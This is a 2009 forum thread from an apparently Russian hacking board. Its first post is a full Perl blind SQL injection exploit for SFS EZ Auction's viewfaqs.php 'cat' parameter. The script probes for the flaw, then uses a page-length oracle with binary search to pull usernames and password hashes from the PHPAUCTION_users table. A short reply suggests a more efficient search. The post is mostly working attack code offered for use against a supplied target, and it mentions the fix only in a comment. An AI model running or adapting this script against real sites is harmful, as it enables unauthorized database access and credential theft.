SFS Auction Blind sql injection Exploit

Discussion in 'Веб-уязвимости' started by Dimi4, 30 Apr 2009.

  1. Dimi4

    Dimi4 Чайный пакетик

    SFS Auction Blind sql injection Exploit

    Code:
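    #!/usr/bin/perl -w
    #
    # SFS EZ Auction - blind SQL injection proof of concept.
    #
    # Usage: perl exploit.pl host[/path]          (e.g. www.target.com/demo)
    #
    # The "cat" parameter of viewfaqs.php appears to be placed into a MySQL
    # query without validation: "cat=1 and 1=0" changes the page (the
    # vulnerability check below keys on exactly that), so a boolean condition
    # appended to "cat=1" can be answered one bit at a time from the length of
    # the response.  The application-side fix is to cast "cat" to an integer
    # or bind it in a prepared statement; this script tells nothing once that
    # is done.
    #
    # Differences from the original listing:
    #   * each character is found by binary search on its ascii() value
    #     (8 requests plus one confirmation, instead of up to 63 linear probes);
    #   * extraction stops at the end of the string (ascii('') is 0) instead of
    #     looping forever after the last character has been printed;
    #   * characters outside the old [a-zA-Z0-9:] charset no longer hang the
    #     loop, since the search covers the whole 0..255 range;
    #   * the subquery is limited to one row; with several rows in
    #     PHPAUCTION_users MySQL raises "Subquery returns more than 1 row" and
    #     every probe looks "true";
    #   * a failed or empty HTTP fetch aborts instead of silently corrupting
    #     the result;
    #   * the always-false baseline is fetched once rather than per position.

    use strict;
    use warnings;
    use LWP::Simple;

    $| = 1;

    print q {

    :::::::::::::::::::::::::::::::::::::::::::::::::::
    :: SFS EZ Auction  Blind sql injection  exploit  ::
    ::                written by Dimi4               ::
    :::::::::::::::::::::::::::::::::::::::::::::::::::

    [~] Greetz: 
    [~] UASC uasc.org.ua
    [~] ANTICHAT forum.antichat.ru

    };

    if (@ARGV < 1) {
        print "Usage: perl exploit.pl [url] \nExample: perl exploit.pl www.target.com/demo\n";
        exit;
    }

    # Accept "host/path", "http://host/path" and a trailing slash; the request
    # URL is always rebuilt as http://<page>/viewfaqs.php?cat=1... below.
    my $page = shift;
    $page =~ s{\Ahttps?://}{}i;
    $page =~ s{/+\z}{};

    my $base = "http://$page/viewfaqs.php?cat=1";

    # Safety cap on the number of characters extracted.  The loop normally
    # stops at the first 0 (end of string); name + ':' + a 32-character hash is
    # far below this.
    my $max_len = 255;

    # Expression whose value is read out one character at a time.  Spaces are
    # written as '+' because the whole thing travels in the query string.
    my $target = '(SELECT+concat_ws(0x3a,name,password)+from+PHPAUCTION_users+limit+1)';

    # fetch($cond): GET the page with $cond appended to "cat=1" and return the
    # body.  Dies on a failed or empty fetch: an unanswered probe would
    # otherwise be taken as "false" and corrupt the binary search.
    sub fetch {
        my ($cond) = @_;
        my $body = get($base . $cond);
        die "\n[-] Request failed for: $cond\n"
            unless defined $body and length $body;
        return $body;
    }

    print "[x] Vulnerability check...\n";

    # A false condition is expected to leave an empty result set, which on the
    # vulnerable version shows up as a PHP warning about mysql_result().
    # "DWarning" is kept from the original listing; presumably a fragment of
    # that warning banner -- confirm against a live response.  The original
    # pattern /mysql_result()/ contained an empty group and matched the bare
    # function name; the parentheses are now matched literally.
    my $chreq = get($base . '+and+1=0');
    $chreq = '' unless defined $chreq;

    if ($chreq =~ m/DWarning/i || $chreq =~ m/\Qmysql_result()\E/i) {
        print "[x] Seems to be vulnerable!\n";
    }
    else {
        print "[o] Seems to be patched, sorry\n";
        exit;
    }

    # Baseline response for a condition that is always false.  Its length is
    # the only thing the oracle compares against, so fetch it once.
    my $false_result = fetch('+and+1=1+and+ascii(substring(version(),1,1))=-1');
    my $false_len    = length $false_result;

    # oracle($cond): 1 when the injected condition is true, 0 otherwise.  A
    # true condition returns the FAQ row and the page length differs from the
    # always-false baseline; that is the whole signal of this blind injection.
    sub oracle {
        my ($cond) = @_;
        return length(fetch('+and+1=1+and+' . $cond)) != $false_len ? 1 : 0;
    }

    # extract_char($pos): ascii() value of character $pos of $target, found by
    # binary search over 0..255 with the ">" oracle (8 queries).  MySQL returns
    # '' for a position past the end of the string and ascii('') is 0, so 0
    # marks the end.  One extra "=" query confirms the value: a noisy length
    # oracle (or a NULL target, e.g. an empty table) would otherwise produce
    # garbage without any indication.
    sub extract_char {
        my ($pos) = @_;
        my $expr = "ascii(substring($target,$pos,1))";
        my ($lo, $hi) = (0, 255);
        while ($lo < $hi) {
            my $mid = int(($lo + $hi) / 2);
            if (oracle("$expr>$mid")) {
                $lo = $mid + 1;
            }
            else {
                $hi = $mid;
            }
        }
        die "\n[-] Oracle inconsistent at position $pos (candidate $lo); "
          . "the length oracle may not work on this target\n"
            unless oracle("$expr=$lo");
        return $lo;
    }

    print "[+] Getting hash...\n";
    print "[+] Hash: ";

    my $hash = '';
    for my $pos (1 .. $max_len) {
        my $code = extract_char($pos);
        last if $code == 0;    # end of name:password
        print chr($code);
        $hash .= chr($code);
    }

    print "\n[+] Done!\n";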
     

  2. Qwazar

    Qwazar Elder - Старейшина

Dimi4: Слать по 63 запроса на символ — не клёво, тем более если можно обойтись в худшем случае шестью запросами (бинарный поиск по значению ascii() вместо перебора всего набора символов).
     